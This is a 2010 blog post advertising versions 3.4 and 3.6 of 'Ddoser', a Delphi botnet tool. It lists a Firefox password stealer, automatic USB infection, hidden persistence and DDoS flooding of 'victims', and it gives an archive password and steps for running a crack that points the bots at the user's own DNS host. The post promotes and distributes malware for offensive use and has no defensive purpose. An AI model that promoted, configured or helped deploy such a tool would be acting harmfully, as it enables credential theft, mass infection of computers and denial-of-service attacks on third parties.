Tuesday, July 27, 2010

Ddoser 3.4 - Credit to Online



(Programmed in Delphi 7 By Sam)

Main Screen Functions:
(Gathers Basic PC Information)

- Gets WAN IP
- Country (With Flags)
- OS Type


- Download (All/Single)
- Update (All/Single)
- Uninstall (All/Single)
- Firefox Password Stealer (All/Single) - [All Versions]

Spreads / Other Bot Notes:
- Auto USB Spread (Infects on run & also can be turned off/not used if wanted)
- 99.9% Infection Rate! (Bot infects all Win32 systems, including Windows 7)
- Very secure startup (Appdata & Hidden)

Client Features / Notes.
- Ping Pong (Keeps all in-active zombies out of the listview. Also helps keeps the bots from pinging out during DDoS Attacks.)
- Friends List In Client (Helps keeps your friends from not getting DDoSed by mistake)
- Victim History (Keep history of all the IPs you have hit recently)
- Client Drag (You can drag the listview down making the client bigger)
- Listview Organization (Click the listview column(s) to organize the zombies)

Ddoser 3.6  


pass:- thisisthepass111

(Programmed in Delphi 7 By Sam)

Main Screen Functions:
(Gathers Basic PC Information)

- Gets WAN IP
- Country (With Flags)
- OS Type


- Download (All/Single)
- Update (All/Single)
- Uninstall (All/Single)
- Firefox Password Stealer (All/Single) - [All Versions]
- Share (All/Single) - [Shares your bots with another ddoser user, they CANT uninstall/download/update for safety]

Spreads / Other Bot Notes:
- Auto USB Spread (Infects on run & also can be turned off/not used if wanted)
- New Infection Log (Shows you when you get a new zombie thats ran for its first time)
- 99.9% Infection Rate! (Bot infects all Win32 systems, including Windows 7)
- Very secure startup (Appdata & Hidden)

Client Features / Notes.
- Ping Pong (Keeps all in-active zombies out of the listview. Also helps keeps the bots from pinging out during DDoS Attacks.)
- Chat System (Lets you chat with all other DDoSeR users)
- Flood Timer (Automatic DDoS Stop, You can set time ammount)
- Friends List In Client (Helps keeps your friends from not getting DDoSed by mistake)
- Victim History (Keep history of all the IPs you have hit recently)
- Client Drag (You can drag the listview down making the client bigger)
- Listview Organization (Click the listview column(s) to organize the zombies) 

[code]how to use Crack:
Extract Ddoser 3.6.rar to folder
Right click on ddoser_crack.bat then click Edit
Replace "yourdns.no-ip.info" with your DNS
Save it and run ddoser_Crack.bat
Run Ddoser-v5.exe after you see like this [/code]

*Remember to place all this things on one folder

{ 14 comments... read them below or Comment }

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